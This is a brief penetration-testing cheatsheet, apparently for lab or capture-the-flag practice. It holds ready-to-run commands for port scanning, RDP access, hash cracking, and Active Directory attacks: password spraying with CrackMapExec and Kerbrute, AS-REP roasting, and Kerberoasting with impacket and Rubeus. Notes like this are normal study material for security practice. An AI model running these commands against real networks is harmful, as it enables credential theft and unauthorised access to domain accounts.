Cheatsheet
Nmap
sudo nmap -p- -A -Pn -v --open $IP
sudo nmap -sS -sV -T4 -oN nmap_default.txt <IP>
Edit /etc/hosts file
echo "10.129.76.146 sea.htb" | sudo tee -a /etc/hosts
Connecting to RDP
xfreerdp3 /u:<username> /d:<domain> /p:<pwd> /v:<IP>
xfreerdp /cert-ignore /u:<uname> /d:<domain> /p:<pwd> /v:<IP>
Hashcat
https://hashcat.net/wiki/doku.php?id=example_hashes
hashcat -m <number> hash wordlists.txt --force
Active Directory
Password Spraying
CrackMapExec - check whether the output shows 'Pwned!'
crackmapexec smb <IP or subnet> -u users.txt -p 'pass' -d <domain> --continue-on-success
Kerbrute
kerbrute passwordspray -d corp.com .\usernames.txt "pass"
AS-REP Roasting
Get the hashes of AS-REP roastable accounts
impacket-GetNPUsers -dc-ip <DC-IP> <domain>/<user>:<pass> -request
Kerberoasting
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast # dump from a compromised Windows host and save with a custom file name
impacket-GetUserSPNs -dc-ip <DC-IP> <domain>/<user>:<pass> -request # from the Kali machine
hashcat -m 13100 hashes.txt wordlist.txt --force # crack the Kerberoast hashes